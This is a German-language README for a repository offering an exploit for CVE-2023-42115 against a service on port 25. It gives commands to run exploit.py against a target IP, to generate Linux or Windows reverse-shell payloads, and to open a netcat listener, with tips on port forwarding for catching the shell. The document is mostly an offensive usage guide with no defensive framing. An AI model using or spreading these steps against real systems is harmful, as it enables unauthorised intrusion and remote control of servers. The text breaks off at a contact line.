
Dieses Modul nutzt eine Schwachstelle im Zieldienst aus, die als CVE-2023-42115 identifiziert wurde.
Dieses Repository enthält zwei Python-Skripte:
exploit.py: Ein Skript zum Ausnutzen von CVE-2023-42115.generate_payload.py: Ein Skript zum Generieren von Reverse-Shell-Payloads.Stellen Sie vor dem Ausführen der Skripte sicher, dass Python 3 auf Ihrem System installiert ist.
git clone https://github.com/isotaka134/cve-2023-42115.git
cd cve-2023-42115
Installieren Sie die erforderlichen Python-Bibliotheken mit pip. Führen Sie den folgenden Befehl aus, um alle notwendigen Abhängigkeiten aus requirements.txt zu installieren:
pip install -r requirements.txt
exploit.py
Dieses Skript nutzt die Sicherheitslücke CVE-2023-42115 aus.
python exploit.py -t <target_ip> -p <target_port> [options]
Optionen:
-t: Die IP-Adresse des Ziels.
-p: Der Port des Zieldienstes.
Beispiel:
python exploit.py -t 192.168.1.10 -p 25 --mode SCAN
python exploit.py -t 192.168.1.10 -p 25 --mode EXPLOIT -f /path/to/payload.sh
generate_payload.py
Dieses Skript generiert einen Reverse-Shell-Payload basierend auf Benutzereingaben.
python generate_payload.py
Schritte:
Das Skript wird Sie nach den folgenden Informationen fragen:
A. Payload-Typ ( linux oder windows)
B. Lokale IP: Adresse für die Reverse-Verbindung
C. Lokaler Port: für die Reverse-Verbindung Hinweis: Wenn Sie sich hinter einem Router oder mit NAT befinden, stellen Sie sicher, dass Sie das korrekte Port-Forwarding zu Ihrem Gerät, auf dem Netcat läuft, eingerichtet haben.
D. Name der Ausgabedatei (z.B. payload.sh für Linux oder payload.ps1 für Windows)
Beispiel:
python generate_payload.py
Payload Generator
Enter payload type (linux/windows): Linux
Enter local IP address: 127.0.0.1
Enter local port: 4444
Enter output file name (e.g., payload.sh or payload.ps1): Payload.sh
Payload saved to Payload.sh
Sie müssen einen Listener auf Ihrem lokalen Rechner einrichten, um die Reverse-Shell abzufangen. Sie können dafür Netcat (nc) verwenden.
nc -lvnp <YOUR_LOCAL_PORT>
nc -lvnp <YOUR_LOCAL_PORT>
Wenn Sie diese Schritte befolgen, sollten Sie in der Lage sein, einen Payload zu erstellen und zu verwenden, um CVE-2023-42115 auszunutzen und eine Reverse-Shell-Verbindung zu erhalten.
Wenn Sie Verbesserungsvorschläge haben oder mitwirken möchten, eröffnen Sie bitte ein Issue oder reichen Sie einen Pull-Request ein.
Bei Fragen oder Unterstützung wenden Sie sich bitte an